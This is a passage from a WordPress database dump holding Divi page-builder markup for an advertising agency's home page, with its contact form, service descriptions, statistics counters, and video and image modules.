text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-08 19:42:50','2020-08-08 19:42:50','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/134-revision-v1/',0,'revision','',0),(691,1,'2020-08-08 19:43:56','2020-08-08 19:43:56','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image 